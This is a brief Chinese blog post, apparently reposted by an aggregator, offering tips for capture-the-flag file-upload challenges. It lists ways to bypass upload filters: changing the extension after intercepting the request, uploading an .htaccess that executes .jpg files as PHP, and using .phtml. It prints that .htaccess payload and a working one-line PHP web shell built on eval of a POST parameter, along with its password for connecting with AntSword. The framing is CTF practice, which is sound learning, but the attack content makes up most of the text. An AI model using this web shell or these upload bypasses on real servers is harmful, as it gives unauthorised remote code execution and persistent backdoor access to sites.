web文件上传思路(一句话muma)
生活随笔
收集整理的这篇文章主要介绍了
web文件上传思路(一句话muma)
小编觉得挺不错的,现在分享给大家,帮大家做个参考.
一.上传shell.jpg(基本没用)
二.上传shell.jpg,抓包之后改shell.php(没有第二次)
三.先上传.htaccess文件绕过,再上传shell.jpg
四.刚学习了一种绕过方法,就是吧shell.jpg的扩展名直接改为.phtml
以上方式成功上传一句话木马之后,链接蚁剑,查看目录找flag即可,
还有例外的上传文件题,flag在配置文件中,需在配置文件中找flag。
附:
.htaccess文件:
<FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
(shell.jpg是一句话木马文件)
一句话木马文件shell.php:
<?php @eval($_POST['pass']);?>
(在用yijian链接时密码就是post括号引号里的)
总结
以上是生活随笔为你收集整理的web文件上传思路(一句话muma)的全部内容,希望文章能够帮你解决所遇到的问题。
- 上一篇: win10安装atom的步骤
- 下一篇: could not establish